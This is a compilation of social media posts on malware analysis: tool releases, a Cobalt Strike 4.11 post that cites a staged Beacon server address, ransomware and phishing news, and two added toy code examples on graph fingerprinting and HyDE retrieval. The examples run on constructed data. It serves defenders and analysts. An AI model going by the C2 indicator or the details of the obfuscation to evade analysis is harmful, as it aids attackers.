nearshorecyber<p>Our Houston-based client is looking for a 👉 𝗿𝗲𝗺𝗼𝘁𝗲 👈 (must be in Mexico) Senior Email Security Analyst with experience with Abnormal Security or a similar email security platform. If you're interested, please apply in English:</p><p><a href="https://recruiterflow.com/nsc/jobs/38" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">recruiterflow.com/nsc/jobs/38</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/Remote" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Remote</span></a> <a href="https://infosec.exchange/tags/WFH" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WFH</span></a> <a href="https://infosec.exchange/tags/Mexico" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Mexico</span></a> <a href="https://infosec.exchange/tags/EmailSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EmailSecurity</span></a> <a href="https://infosec.exchange/tags/AbnormalSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>AbnormalSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a> <a href="https://infosec.exchange/tags/Nearshore" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Nearshore</span></a> <a href="https://infosec.exchange/tags/CybersecurityJobs" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CybersecurityJobs</span></a></p>
Anonymous 🐈️🐾☕🍵🏴🇵🇸 :af:<p>Experts report that a new social engineering technique is using ClickFix Captcha to deliver malware like Quakbot, effectively bypassing traditional security measures and posing a significant threat. <a href="https://kolektiva.social/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://kolektiva.social/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://darkatlas.io/blog/delivering-trojans-via-clickfix-captcha" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">darkatlas.io/blog/delivering-t</span><span class="invisible">rojans-via-clickfix-captcha</span></a></p>
Volexity :verified:<p>In the course of its investigations, <span class="h-card" translate="no"><a href="https://infosec.exchange/@volexity" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>volexity</span></a></span> frequently encounters malware samples written in Golang. This reflects the increase in popularity of Golang generally, and presents challenges to reverse engineering tools.<br>&nbsp;<br>Today, <span class="h-card" translate="no"><a href="https://infosec.exchange/@volexity" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>volexity</span></a></span> is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. <span class="h-card" translate="no"><a href="https://infosec.exchange/@r00tbsd" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>r00tbsd</span></a></span> &amp; Killian Raimbaud presented details at INCYBER Forum earlier today.<br>&nbsp;<br>GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time &amp; speeds up investigations!<br>&nbsp;<br>Check out the blog post on how GoResolver works and where to download it: <a href="https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">volexity.com/blog/2025/04/01/g</span><span class="invisible">oresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/</span></a><br>&nbsp;<br><a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a></p>
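Added example to show the idea behind "control-flow graph similarity to identify library code"; it is neither GoResolver nor Volexity's algorithm. Each function is reduced to a labelled control-flow graph, fingerprinted with a simplified Weisfeiler-Lehman hash that ignores addresses and symbol names, and matched against fingerprints taken from a clean build of the same library; whatever does not match is what the analyst keeps. All CFGs below are constructed by hand, and exact-hash matching is the toy version of what a real tool does with similarity scores.

```python
import hashlib


def block_label(n_instr: int, terminator: str) -> str:
    """Address-free summary of a basic block: how it ends plus a size bucket."""
    bucket = "s" if n_instr < 4 else "m" if n_instr < 12 else "l"
    return f"{terminator}:{bucket}"


def make_cfg(blocks):
    """blocks: {block_id: (instruction_count, terminator, [successor_ids])} -> labelled CFG."""
    return {b: (block_label(n, t), succs) for b, (n, t, succs) in blocks.items()}


def wl_hash(cfg, rounds: int = 3) -> str:
    """Weisfeiler-Lehman style fingerprint: fold each block's neighbour labels into its
    own for a few rounds, then combine all block labels order-independently. Block ids
    never enter the hash, so relocation or symbol stripping does not change it."""
    labels = {b: lbl for b, (lbl, _) in cfg.items()}
    for _ in range(rounds):
        labels = {
            b: hashlib.sha256(
                (labels[b] + "|" + ",".join(sorted(labels[s] for s in succs))).encode()
            ).hexdigest()[:16]
            for b, (_, succs) in cfg.items()
        }
    return hashlib.sha256(",".join(sorted(labels.values())).encode()).hexdigest()[:32]


def resolve(stripped, library):
    """Map stripped function names to library names by fingerprint match; everything
    unmatched is returned separately as the set still needing manual analysis."""
    index = {wl_hash(cfg): name for name, cfg in library.items()}
    renamed, unresolved = {}, []
    for fn, cfg in stripped.items():
        name = index.get(wl_hash(cfg))
        if name:
            renamed[fn] = name
        else:
            unresolved.append(fn)
    return renamed, unresolved


# Constructed CFGs standing in for functions lifted from a clean Go build (names known)...
LIBRARY = {
    "runtime.memmove": make_cfg({0: (3, "jcc", [1, 2]), 1: (8, "jmp", [3]),
                                 2: (6, "jmp", [3]), 3: (2, "ret", [])}),
    "strings.Index": make_cfg({0: (5, "jcc", [1, 3]), 1: (7, "jcc", [2, 1]),
                               2: (3, "jmp", [3]), 3: (1, "ret", [])}),
}
# ...and from the obfuscated sample (names stripped, blocks at other addresses).
STRIPPED = {
    "sub_4a1f20": make_cfg({0x4a1f20: (3, "jcc", [0x4a1f31, 0x4a1f60]), 0x4a1f31: (8, "jmp", [0x4a1f90]),
                            0x4a1f60: (6, "jmp", [0x4a1f90]), 0x4a1f90: (2, "ret", [])}),
    "sub_4b0100": make_cfg({0x4b0100: (5, "jcc", [0x4b0120, 0x4b0180]), 0x4b0120: (7, "jcc", [0x4b0160, 0x4b0120]),
                            0x4b0160: (3, "jmp", [0x4b0180]), 0x4b0180: (1, "ret", [])}),
    # Beaconing loop with no counterpart in the library set: stays for manual analysis.
    "sub_4c2200": make_cfg({0x4c2200: (4, "jcc", [0x4c2210, 0x4c2260]), 0x4c2210: (15, "call", [0x4c2200]),
                            0x4c2260: (20, "call", [0x4c2290]), 0x4c2290: (2, "ret", [])}),
}

if __name__ == "__main__":
    renamed, left = resolve(STRIPPED, LIBRARY)
    print("renamed:", renamed)
    print("still unknown:", left)
```

Exact fingerprint equality only holds when the library was compiled the same way; a different compiler version or inlining decision perturbs the graph, which is why production tooling scores similarity between graphs and accepts matches above a threshold rather than requiring identity.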
Sajid Nawaz Khan :donor:<p>For hobbyist Cobalt Strike Beacon collectors, note that the recently announced 4.11 update introduces a number of changes to frustrate Beacon configuration extraction, namely through the new `transform-obfuscate` field.</p><p>When set, this field can apply multiple layers of encoding, encryption and compression (with some recent Beacons observed with a 32 byte XOR key, configurable up to 2048 bytes!).</p><p>While still reasonably trivial to decode manually, standard automated workflows (say, through the SentinelOne parser) will now fail, not least because of changes to the well-known field markers.</p><p>Beacons with these characteristics have thus far been observed with watermarks indicative of licensed instances, though I imagine it is only a matter of time before the 4.11 capabilities become accessible to all manner of miscreants.</p><p>A sample configuration, via a staged Beacon on 104.42.26[.]200 is attached, including the three distinct XOR keys used to decode it.</p><p><a href="https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">cobaltstrike.com/blog/cobalt-s</span><span class="invisible">trike-411-shh-beacon-is-sleeping</span></a></p><p><a href="https://infosec.exchange/tags/cobaltstrike" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cobaltstrike</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/forensics" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>forensics</span></a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a></p>
MalwareLab<p>I saw a demo of <a href="https://infosec.exchange/tags/StratoShark" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>StratoShark</span></a> at SharkFest in November. It will be a useful addition to the <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> toolkit. <br>Imagine <a href="https://infosec.exchange/tags/procmon" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>procmon</span></a> and <a href="https://infosec.exchange/tags/apimonitor" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>apimonitor</span></a> (or strace/ltrace) with the user interface of <a href="https://infosec.exchange/tags/wireshark" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>wireshark</span></a>, including support for powerful Wireshark display filters. </p><p><a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/sf24eu" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>sf24eu</span></a> <span class="h-card" translate="no"><a href="https://ioc.exchange/@wireshark" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>wireshark</span></a></span> <span class="h-card" translate="no"><a href="https://infosec.exchange/@geraldcombs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>geraldcombs</span></a></span> </p><p>RE: <a href="https://infosec.exchange/@geraldcombs/113680686165407123" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">infosec.exchange/@geraldcombs/</span><span class="invisible">113680686165407123</span></a></p>
Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #18</p><p>I’ve built a PCAP analyzer with GenAI—let me explain! 👇</p><p>PCAP analysis can be quite tricky, especially if you’re not familiar with the protocols or aren’t sure what to search for. To simplify this, I created a tool that processes PCAP data and passes it into an Embedding.</p><p>Yes, I used a RAG. 😏</p><p>But I used something else too! 😉</p><p>I wanted to introduce you to another concept—HYDE or Hypothetical Document Embeddings.</p><p>HYDE improves RAG when queries are complex, data are noisy, or patterns are subtle—just like... a PCAP!</p><p>HYDE will generate hypothetical insights based on the user’s query (e.g., “What anomalies exist in this traffic?”). Using Hypothetical Document Embeddings, the tool expands your query into a contextual document that captures the intent, to retrieve more relevant packets and patterns! 🤔</p><p>👉 Think of it this way: you are in a library searching for "AI in cybersecurity". Instead of an exact title, you describe what you need (a hypothetical document). The librarian finds books matching your description, even if the keywords don’t align. You get the idea? 🤯</p><p>That’s exactly what HYDE does for your queries. It expands the context and meaning, to make your retrieval smarter and more precise.</p><p>Have a look at the output below; there is a HUGE difference between the RAG with HYDE and the one without! 😎</p><p>Follow along—I’ll share the code tomorrow as I want to explain something else! 🫡</p><p>➡️ HYDE Paper: <a href="https://arxiv.org/pdf/2212.10496" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">arxiv.org/pdf/2212.10496</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/genai" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>genai</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>pcap</span></a> <a href="https://infosec.exchange/tags/network" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>network</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a></p>
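<p>The HyDE mechanism from the post above, as an added worked example (written for this page; it is not Thomas Roccia's tool and the code he mentions is not shown here). Everything in it is constructed: the packet summaries stand in for lines extracted from a PCAP, the bag-of-words cosine similarity stands in for a real embedding model, and <code>hypothetical_document()</code> hard-codes the text an LLM would generate for the one query the demo runs. The point it shows is the one the post makes: the literal query "What anomalies exist in this traffic?" shares no vocabulary with any packet and retrieves nothing, while the hypothetical document, which describes what an answer would look like, pulls out the beaconing and DNS TXT lines.</p>

```python
"""Toy HyDE-style retrieval over packet summaries (added example, not the post's code)."""
import math
import re
from collections import Counter

# Constructed packet summaries standing in for lines pulled from a PCAP.
# Addresses are documentation/private ranges, not real traffic.
PACKET_SUMMARIES = [
    "tcp 10.0.0.5:51122 -> 10.0.0.7:445 smb2 tree connect share IPC$",
    "udp 10.0.0.5:53211 -> 10.0.0.1:53 dns query A www.example.com",
    "tcp 10.0.0.5:51130 -> 203.0.113.9:443 tls client hello sni update.example.net",
    "udp 10.0.0.5:53212 -> 10.0.0.1:53 dns query TXT long base64 label 0x4a7f...example.org",
    "tcp 10.0.0.5:51140 -> 198.51.100.4:8080 http post /gate.php interval 60s beacon",
    "tcp 10.0.0.5:51141 -> 198.51.100.4:8080 http post /gate.php interval 60s beacon",
    "icmp 10.0.0.5 -> 10.0.0.1 echo request",
]

QUERY = "What anomalies exist in this traffic?"

STOPWORDS = {"a", "an", "and", "at", "in", "is", "of", "that", "the", "this", "to", "what", "with", "for"}


def tokenize(text):
    """Lower-case word tokens that start with a letter; drops ports, IPs and hex blobs."""
    return [t for t in re.findall(r"\b[a-z][a-z0-9]*\b", text.lower()) if t not in STOPWORDS]


def embed(text):
    """Bag-of-words vector: a stand-in for a dense embedding model."""
    return Counter(tokenize(text))


def cosine(a, b):
    dot = sum(a[t] * b[t] for t in a.keys() & b.keys())
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0


# The "vector store": every packet summary embedded once.
INDEX = [(summary, embed(summary)) for summary in PACKET_SUMMARIES]


def retrieve(text, k=3):
    """Plain RAG step: embed the text and return the top-k packets with non-zero similarity."""
    q = embed(text)
    scored = [(i, cosine(q, vec)) for i, (_, vec) in enumerate(INDEX)]
    scored = [(i, s) for i, s in scored if s > 0.0]
    scored.sort(key=lambda item: -item[1])  # stable: equal scores keep packet order
    return scored[:k]


def hypothetical_document(query):
    """Stand-in for the LLM call in HyDE.

    A real pipeline prompts a model with the query and embeds its answer; here the
    answer is hard-coded (constructed) for the single query this demo runs.
    """
    return (
        "Suspicious traffic in this capture: a periodic http post beacon to an "
        "external host at a fixed interval, and a dns txt query carrying a long "
        "base64 label that suggests tunnelling."
    )


def hyde_retrieve(query, k=3):
    """HyDE: retrieve with the hypothetical answer instead of the raw query."""
    return retrieve(hypothetical_document(query), k)


def shared_terms(text, packet_index):
    """Which tokens made a packet score: useful to explain a hit to an analyst."""
    return sorted(embed(text).keys() & INDEX[packet_index][1].keys())


if __name__ == "__main__":
    print("direct query  :", retrieve(QUERY))          # [] : no vocabulary overlap
    for i, score in hyde_retrieve(QUERY):
        print(f"hyde {score:.3f} : {PACKET_SUMMARIES[i]}")
        print("    matched on:", shared_terms(hypothetical_document(QUERY), i))
```

<p>The scores are deliberately crude; what carries over to a real deployment is the shape of the pipeline (query, generated hypothetical answer, embed that answer, nearest neighbours) and the explanation step, which lets you check that a retrieved packet was matched on protocol behaviour rather than on a coincidental token.</p>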
Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #14</p><p>Mandiant has just released XRefer, an open-source IDA Pro plugin that clusters binary functions and leverages Gemini and other models for the analysis.</p><p>The tool can generate a ‘map’ of a binary, to assist analysts in understanding the structure of the binary. 👨‍💻</p><p>In the demo below, you can see how the tool clusters parts of the binary and adds additional details about malware functionalities such as command execution, C2 communication, or encryption. 👇</p><p>I haven’t tried it yet, but it looks promising! 🤩</p><p>➡️ <a href="https://github.com/mandiant/xrefer" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">github.com/mandiant/xrefer</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/GenAI" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>GenAI</span></a> <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a></p>
buherator<p>My friends at Ravenfortech wrote an introductory <a class="hashtag" href="https://infosec.place/tag/malwareanalysis" rel="nofollow noopener" target="_blank">#malwareanalysis</a> post on the INC <a class="hashtag" href="https://infosec.place/tag/ransomware" rel="nofollow noopener" target="_blank">#Ransomware</a>:</p><p><a href="https://translate.kagi.com/https://scribe.rip/@ravenfortech/inc-ransomware-elemz%C3%A9s-a909b5aed114" rel="nofollow noopener" target="_blank">https://translate.kagi.com/https://scribe.rip/@ravenfortech/inc-ransomware-elemz%C3%A9s-a909b5aed114</a></p><p>This gang recently pwned the Hungarian company responsible for military procurement (VBÜ) and is now selling the data for $1M.</p><p><a href="https://444.hu/2024/12/01/visszakerultek-a-netre-a-vedelmi-beszerzesi-ugynokseg-ellopott-adatai-egymillio-dollarrol-indul-a-licit" rel="nofollow noopener" target="_blank">https://444.hu/2024/12/01/visszakerultek-a-netre-a-vedelmi-beszerzesi-ugynokseg-ellopott-adatai-egymillio-dollarrol-indul-a-licit</a></p><p>Based on the analysis, the malware is very simple. INC uses CitrixBleed (2023) and spear phishing for initial access: </p><p><a href="https://www.sentinelone.com/anthology/inc-ransom/" rel="nofollow noopener" target="_blank">https://www.sentinelone.com/anthology/inc-ransom/</a></p><p>This doesn’t paint a picture of mature security at VBÜ to say the least…</p>
loneicewolf<p>I accidentally removed this; 1 sec</p><p>Hello! I just joined; a friend mentioned this nice social and I just joined. Happy to be here! A small intro: I am 24 years old and I am always into reverse engineering. More specifically - malware reversing. Including Rootkits, EQGRP stuff, and such. Nice to meet everyone! </p><p>If needed, my github is this:<br><a href="https://github.com/loneicewolf" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="">github.com/loneicewolf</span><span class="invisible"></span></a><br>(I always include it in intros)</p><p>❤️ Wishes and Saluting Sweden!<br>DMs/PMs open; if needed ^_^ 🌹</p><p><a href="https://defcon.social/tags/intro" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>intro</span></a> <a href="https://defcon.social/tags/introduction" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>introduction</span></a> <a href="https://defcon.social/tags/revers" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>revers</span></a> <a href="https://defcon.social/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a> <a href="https://defcon.social/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://defcon.social/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a></p>
MalwareLab<p>The recording from last week's <a href="https://infosec.exchange/tags/ANYRUN" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ANYRUN</span></a> webinar is here. Almost no marketing slides, mostly live demo of the technical capabilities of the <a href="https://infosec.exchange/tags/sandbox" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>sandbox</span></a>. A good introduction to behavioral analysis for <a href="https://infosec.exchange/tags/cybersec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersec</span></a> students and practitioners without deep knowledge in <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a>. </p><p>📽️ recording: <a href="https://event.webinarjam.com/replay/2/ngl5pt5imhvhvk9" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">event.webinarjam.com/replay/2/</span><span class="invisible">ngl5pt5imhvhvk9</span></a></p><p>📚 guide: <a href="https://files.any.run/images/malware_analysis_in_ANY.RUN_ultimate_guide.pdf" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">files.any.run/images/malware_a</span><span class="invisible">nalysis_in_ANY.RUN_ultimate_guide.pdf</span></a></p>